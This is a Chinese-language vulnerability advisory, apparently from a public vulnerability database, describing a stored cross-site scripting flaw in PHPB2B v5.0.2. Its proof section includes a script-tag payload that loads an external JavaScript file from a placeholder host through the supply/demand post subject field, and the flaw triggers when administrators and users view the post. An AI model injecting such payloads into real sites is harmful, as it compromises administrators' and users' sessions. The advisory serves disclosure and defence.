PHPB2B存储型跨站(可打管理员和任意用户)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: PHPB2B v5.0.2对字段过滤不严格导致存储型跨站,可嵌入任意脚本文件,攻击管理员和任意用户。 ### 详细说明: 1、phpB2B对用户发布供求信息模块,没有进行有效过滤,存在漏洞的字段包括主题、包装说明、价格说明等等。攻击者可以插入恶意代码,后台管理员审核用户供求信息时,漏洞触发,审核过程中,管理员并不会发现任何恶意代码,审核一旦成功,其它任何用户浏览供求信息时,便会触发漏洞。 通杀所有浏览器。 ### 漏洞证明: 1、以发布供求信息主题字段为例进行说明。 2、用户进入商务室进行发布供求信息 3、在主题字段嵌入如下恶意代码: `<script src=http://127.0.0.1/eXploit.js></script>` [<img src="https://images.seebug.org/upload/201406/1610144097bec3d7f50f509aae18903b686629d1.png" alt="phpb2b1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1610144097bec3d7f50f509aae18903b686629d1.png) 4、管理员审核用户供求信息,进入审核页面时,漏洞便可触发: [<img src="https://images.seebug.org/upload/201406/161015597d0c3e71c2377e1ada1d5d0faa3ee611.png" alt="phpb2b2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/161015597d0c3e71c2377e1ada1d5d0faa3ee611.png) 5、查看页面源代码,成功嵌入恶意脚本 [<img src="https://images.seebug.org/upload/201406/161016497732236007d371cbab4ec22aca9be7a6.png" alt="phpb2b3.png"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息